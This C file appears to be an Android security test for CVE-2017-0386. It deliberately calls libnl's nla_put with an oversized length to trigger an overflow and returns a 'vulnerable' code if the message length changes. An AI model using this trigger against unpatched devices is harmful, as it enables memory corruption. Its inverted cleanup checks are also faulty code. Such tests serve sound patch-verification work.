You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
101 lines
2.5 KiB
101 lines
2.5 KiB
/**
|
|
* Copyright (C) 2019 The Android Open Source Project
|
|
*
|
|
* Licensed under the Apache License, Version 2.0 (the "License");
|
|
* you may not use this file except in compliance with the License.
|
|
* You may obtain a copy of the License at
|
|
*
|
|
* http://www.apache.org/licenses/LICENSE-2.0
|
|
*
|
|
* Unless required by applicable law or agreed to in writing, software
|
|
* distributed under the License is distributed on an "AS IS" BASIS,
|
|
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
|
* See the License for the specific language governing permissions and
|
|
* limitations under the License.
|
|
*/
|
|
#define _GNU_SOURCE
|
|
|
|
#define LOG_TAG "CVE-2017-0386"
|
|
|
|
#include <sys/wait.h>
|
|
#include <sys/types.h>
|
|
#include <stdio.h>
|
|
#include <log/log.h>
|
|
#include <netlink/msg.h>
|
|
#include <netlink/netlink.h>
|
|
#include <netlink-private/object-api.h>
|
|
#include <netlink-private/types.h>
|
|
#include <netlink/object.h>
|
|
#include <netlink/attr.h>
|
|
|
|
#include "../includes/common.h"
|
|
|
|
int main(void) {
|
|
struct nl_msg *message = NULL;
|
|
struct nlmsghdr *hdr;
|
|
char *data = NULL;
|
|
uint32_t result = 0;
|
|
int ret = EXIT_SUCCESS;
|
|
int pagesize = getpagesize();
|
|
size_t payloadlength = pagesize + 12 - 0x30;
|
|
size_t payload2length = pagesize;
|
|
|
|
message = nlmsg_alloc();
|
|
if (message == NULL) {
|
|
ALOGE("Alloc message memory failed");
|
|
return EXIT_FAILURE;
|
|
}
|
|
|
|
ALOGI("nl_msg.nm_size : %zx\n", message->nm_size);
|
|
hdr = message->nm_nlh;
|
|
|
|
//allocate memory for data with payloadlength
|
|
data = malloc(payloadlength);
|
|
if (data == NULL) {
|
|
ALOGE("Alloc data memory failed");
|
|
nlmsg_free(message);
|
|
return EXIT_FAILURE;
|
|
}
|
|
|
|
memset(data, 0x41, payloadlength);
|
|
nla_put(message, 0x4444, payloadlength, data);
|
|
result = hdr->nlmsg_len;
|
|
ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
|
|
ALOGI("message len = 0x%x", result);
|
|
|
|
free(data);
|
|
data = NULL;
|
|
|
|
//allocate memory for data with payload2length
|
|
data = malloc(payload2length);
|
|
if (data == NULL) {
|
|
ALOGE("Alloc data2 memory failed");
|
|
nlmsg_free(message);
|
|
return EXIT_FAILURE;
|
|
}
|
|
memset(data, 0x33, payload2length);
|
|
ALOGI("\n\n\nPutting down overflow.......\n\n\n");
|
|
nla_put(message, 0x8888, 0xFFFFF000, data);
|
|
|
|
ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
|
|
ALOGI("message len = 0x%x", hdr->nlmsg_len);
|
|
|
|
/*
|
|
* return 113 error code if length is mismatch
|
|
*/
|
|
if(result != hdr->nlmsg_len) {
|
|
ret = EXIT_VULNERABLE;
|
|
}
|
|
|
|
if(!data) {
|
|
free(data);
|
|
data = NULL;
|
|
}
|
|
|
|
if(!message) {
|
|
nlmsg_free(message);
|
|
message = NULL;
|
|
}
|
|
return ret;
|
|
}
|